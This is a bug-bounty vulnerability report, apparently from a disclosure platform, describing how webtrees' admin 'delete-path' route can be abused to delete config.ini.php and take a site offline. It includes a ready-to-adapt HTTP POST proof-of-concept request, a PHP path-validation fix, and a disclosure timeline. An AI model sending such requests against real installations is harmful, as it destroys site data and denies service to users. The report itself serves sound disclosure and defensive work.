Insufficient Isolation of System-Dependent Functions in fisharebest/webtrees

Valid

Reported on

Sep 12th 2021


✍️ Description

A malicious actor, either logged in as an admin or after intercepting an admin's request, can modify the path argument of the delete-path route and arbitrarily delete index.php or config.ini.php, rendering the site unusable.

🕵️‍♂️ Proof of Concept

1. An admin navigates to the Clean up data folder page in the Control Panel and clicks delete on a deletable folder such as cache/.

2. Intercept the POST request and replace the value of the path= argument with config.ini.php. (Alternatively, use the request below and replace the placeholder values.)

3. Send the request; the server answers with 204 No Content.

4. Refresh the site. It is now unavailable, because the missing config file makes webtrees attempt to reinstall itself.

POST /webtrees/index.php?route=%2Fwebtrees%2Fadmin%2Fdelete-path&path=config.ini.php HTTP/1.1
Host: (-----Replace-----)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://hunterbase.duckdns.org:8000/webtrees/index.php?route=%2Fwebtrees%2Fadmin%2Fclean
X-CSRF-TOKEN: (-----Replace-----)
X-Requested-with: XMLHttpRequest
Origin: (-----Replace-----)
Connection: close
Cookie: (-----Replace-----)

💥 Impact

While it requires high privileges, the Clean up data folder function essentially allows anyone holding an admin session cookie (obtained or intercepted) to carry out a denial of service by deleting an important config file, rendering the site unusable for everyone.

Suggestion

Match the request against a defined list of files that should not be deleted.
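The suggested check, as an added PHP example that is not webtrees' own code: it rejects a defined list of protected file names and, going beyond the report's deny-list, also confirms that the resolved target stays inside the data folder. The function name, the protected-name list and the data-folder argument are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not webtrees' own code. Assumes $dataFolder is the absolute
// directory the clean-up tool may operate in and $requested is the raw path=
// value from the delete-path request. Function name is hypothetical.

const PROTECTED_NAMES = ['config.ini.php', 'index.php', '.htaccess'];

function isDeletablePath(string $dataFolder, string $requested): bool
{
    // Only relative entries are acceptable: no empty, absolute or NUL-bearing input.
    if ($requested === '' || $requested[0] === '/' || strpos($requested, "\0") !== false) {
        return false;
    }
    // Deny-list check on every path component, before touching the filesystem,
    // so "cache/../config.ini.php" is caught as well as "config.ini.php".
    foreach (explode('/', str_replace('\\', '/', $requested)) as $segment) {
        if (in_array(strtolower($segment), PROTECTED_NAMES, true)) {
            return false;
        }
    }
    // realpath() resolves ".." and symlinks, so the target must still sit
    // strictly below the data folder to be deletable.
    $root   = realpath($dataFolder);
    $target = realpath($dataFolder . DIRECTORY_SEPARATOR . $requested);
    if ($root === false || $target === false) {
        return false;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0;
}

// Constructed sample data folder so the check can be exercised offline.
$data = sys_get_temp_dir() . '/demo-data-' . bin2hex(random_bytes(4));
mkdir($data . '/cache', 0700, true);
touch($data . '/config.ini.php');
touch($data . '/cache/thumb.dat');

var_dump(isDeletablePath($data, 'cache'));                   // deletable cache directory
var_dump(isDeletablePath($data, 'cache/thumb.dat'));         // file inside the cache
var_dump(isDeletablePath($data, 'config.ini.php'));          // protected config file
var_dump(isDeletablePath($data, 'cache/../config.ini.php')); // traversal to the config file
var_dump(isDeletablePath($data, '../'));                     // escape above the data folder

// Remove the constructed sample data again.
unlink($data . '/cache/thumb.dat');
unlink($data . '/config.ini.php');
rmdir($data . '/cache');
rmdir($data);
```

Only the first two calls pass; the deny-list catches the config file in both spellings and the prefix check stops the escape above the data folder.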

📍 Location CleanDataFolder.php#L92

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back a year ago
PHoward modified the report
a year ago
Greg Roach validated this vulnerability a year ago
PHoward has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach marked this as fixed with commit dde5ec a year ago
Greg Roach has been awarded the fix bounty
This vulnerability will not receive a CVE